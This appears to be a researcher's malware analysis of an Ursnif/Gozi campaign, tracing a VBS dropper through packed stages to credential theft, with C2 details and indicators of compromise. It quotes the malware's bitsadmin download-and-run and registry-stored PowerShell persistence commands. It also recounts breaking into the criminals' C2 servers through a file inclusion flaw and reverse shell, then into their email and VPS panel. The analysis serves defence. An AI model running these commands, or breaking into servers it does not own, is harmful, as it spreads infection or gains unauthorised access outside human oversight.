My entire "Cyber adventure" began from a simple email within a .ZIP file named "Nuovo" as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041) . Inside the ZIP a .VBS file (sha265: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which for the time being August 21 2018 was totally unknown from VirusTotal (unknown = not yet analysed) was ready to get started through double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to avoid simple reverse engineering analyses on it, but I do like  de-obfuscate hidden code (every time it's like a personal challenge). After some hardworking-minutes ( :D ) Stage1 was totally de-obfuscated and ready to be interpreted in plain text. It appeared clear to me that Stage1 was in charged of evading three main AVs such as: Kaspersky Lab, Panda Security and Trend Micro by running simple scans on Microsoft Regedit and dropping and executing additional software.

Stage1. Obfuscation
Indeed if none of searched AV were found on the target system Stage1 was acting as a simple downloader. The specific performed actions follows:
"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
Stage1 was dropping and executing a brand new PE file named: rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using the bitsadmin.exe native Microsoft program. BitsAdmin.exe is a command-line tool that system admin can use to create download or upload jobs and monitor their progress over time. This technique have been widely used by Anunak APT during bank frauds on the past few years.

The Stage2 analysis (huge step ahead here)  brought me to an additional brand new Drop and Decrypt stager. Stage3 introduced additional layers of anti-reverse engineering. The following image shows the additional PE section within high entropy on it. It's a significative indication of a Decrypter activity.

Stage2. Drop and Decrypt the Stage3. You might appreciate the high Entropy on added section

Indeed Stage 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. A UPX algorithm was used to hide the real payload in such a way many AV engines were not able to detect it since signature was changing from original payload. Finally the de-packed payload presented many interesting features; for example it was weaponised with evasion techniques such as: timing delay (through sleep), loop delay by calling 9979141 times GetSystemTimeAsFileTime API, BIOS versioning harvesting, system manufacturer information and system fingerprinting to check if it was running on virtual or physical environment. It installed itself on windows auto-run registry to get persistence on the victim machine. The following action was performed while running in background flag:
cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6').Audibrkr))

The final payload executed the following commands and spawned two main services (WSearch, WerSvc) on the target.
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:406536 /prefetch:2
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:65800 WinX:0 WinY:0 IEFrame:0000000000000000
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:144390 /prefetch:2
C:\Windows\system32\SearchIndexer.exe /Embedding
taskhost.exe SYSTEM
taskhost.exe $(Arg0)
C:\Windows\System32\svchost.exe -k WerSvcGroup
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\system32\SearchFilterHost.exe" 0 552 556 564 65536 560
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:592 CREDAT:209921 /prefetch:2
cmd /C "nslookup > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
C:\Windows\system32\WerFault.exe -u -p 2524 -s 288
"C:\Windows\system32\wermgr.exe" "-queuereporting_svc" "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_82b9a110b3b94c55171865162b471ffb8fadc7c6_cab_0ab86b12"

Stage3 finally connects back to C2s once checked its own ip address. Two main C2s were observed:

    • C2 level_1 (for domains and ips check the IoC section). The Stage3 connects back to C2 level_1 to get weaponised. Level_1 Command and Controls get information on victims and deliver plugins to expand the infection functionalities.
    • C2 level_2 (for domains and ips check the IoC section). Stage 3 indirectly connects to C2 level_2 in order to give stolen information. It 's a Ursniff/Gozi and it exfiltrates user credentials by looking for specific files, getting user clipboard and  by performing main in the browser attack against main web sites such as: paypal gmail, microsoft and many online services.

So far so good. Everything looks like one of my usual analyses, but something got my attention. The C2 level_1 had an administration panel which, on my personal point of view, was "hand made" and pretty "young" as implementation by meaning of HTML with not client side controls, no clickjacking controls and not special login tokens. According to Yoroi's mission (to defend its customers) I decided to go further and try to defend people and/or infected companies by getting inside the entire network and  to collaborate to local authorities to shut them down, by getting as much information as possible in order to help federal and local police to fight the Cyber Crime.

Fortunately I spotted a file inclusion vulnerability in Command and Control which took me in ! The following image shows a reverse shell I spawned on Attacker's command and control.

Reverse Shell On C2 Stage_1

Now, I was able to download the entire Command and Control Source Code (php) and study it ! The study of this brand new C2  took me to the next level. First of all I was able to get access to the local database where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image proves that the downloaded Command and Control system has Macedonian dialect (Cyrillic language) on it, according to Anunak APT report made by group-ib.

Command and Control Source Code (snip)
The following image represents a simple screenshot of the database dump within Victim IPs (which are undisclosed for privacy reasons).

C2 level_1 Database 

Additional investigations on database brought new connected IPs. Those IPs were querying the MySQL with administrative rights. At least additional two layers of C2 were present. While the level_1 was weaponising the malware implant the level_2 was collecting information from victims. Thanks to the source code study has been possibile to found more 0Days to be used against C2 and in order to break into the C2 level_2 . Now I was able to see encrypted URLs coming from infected hosts.  Important steps ahead are intentionally missing. Among many URLs the analyst was able to figure out a "test" connection from the Attacker and focus to decrypt such a connection. Fortunately everything needed was written on command and control source code. In the specific case the following function was fundamental to get to clear text !

URL Decryption Function
The eKey was straight on the DB and the decryption function was quite easy to reverse. Finally it was possible to figured out how to decrypt the attacker testing string (the first transaction available on logs) and voilà, it was possible to checkin in attacker's email :D !

Attacker eMail: VPS credentials
Once "in" a new need came: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker infrastructure it was possible to get access to the entire VPS control panel. At this point it was clear the general infrastructure picture* and how to block the threat, not only for customers but for everybody !

Attacker VPS Environment

Sharing these results for free would make vendors (for example: AV companies, Firewall companies, IDS companies and son on) able to update their signatures and to block such a threat for everybody all around the world. I am sure that this work would not block malicious actors, BUT at least we might rise our voice against cyber criminals ! 

In this post I described the main steps that took me to gain access to a big Ursniff/Gozi Botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions have been performed on attacker infrastructure). The threat appeared very well structured, Docker containers were adopted in order to automatise the malicious infrastructure deployment and the code was quite well engineered. Many layers of command and control were found and the entire infrastructure was probably set up from a criminal organisation and not from a single person.

The following graph shows the victim distribution on August 2018. The main targets currently are USA with a 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims on August 2018 are several thousands.

Victims Distribution on August 24 2018

During the analyses was interesting to observe attacker was acquiring domains from an apparent "black market"where many actors where selling and buying "apparent compromised domains" (no evidence on this last sentence, only feeling). The system (following picture) looks like a trading platform within public API that third party systems can operate such as stock operators.

Apparent Domain BlackMarket

Hope you enjoyed the reading.

Following a list of interesting artefacts that would be helpful to block and prevent the described threat.

  • 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d (.vbs)
  • 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041 (Nuovo
  • 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c (rEOuvWkRP.exe)
  • 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e (Stage 3.exe)
Windows Services Names:
  • WSearch
  • WerSvc
Involved eMails:
Involved IPs:
  • 198[.]54[.]116[.]126 (Dropper Stage 2)
  • 195[.]123[.]237[.]123 (C2 level_1)
  • 185[.]212[.]47[.]9 (C2 level_1)
  • 52[.]151[.]62[.]5 (C2 level_1)
  • 185[.]154[.]53[.]185 (C2 level_1)
  • 185[.]212[.]44[.]209 (C2 level_1)
  • 195[.]123[.]237[.]123 (C2 level_1)
  • 185[.]158[.]251[.]173 (General Netwok DB)
  • 185[.]183[.]162[.]92 (Orchestrator CPANEL)

Involved Domains:
  • http://englandlistings[.]com/pagverd75.php (Dropper Stage 2)
  • https://pool[.]jfklandscape[.]com  (C2 level_1)
  • https://pool[.]thefutureiskids[.]com (C2 level_1)
  • https://next[.]gardenforyou[.]org (C2 level_1)
  • https://1000numbers[.]com (C2 level_1)
  • https://batterygator[.]com (C2 level_1)
  • https://beard-style[.]com (C2 level_1)
  • https://pomidom[.]com (C2 level_1)
  • (C2 level_1)
  • (C2 level_1)
  • (C2 level_1)
  • (C2 level_1)
  • (Orchestrator CPANEL)

*Actually it was not the whole network, a couple of external systems were investigated as well.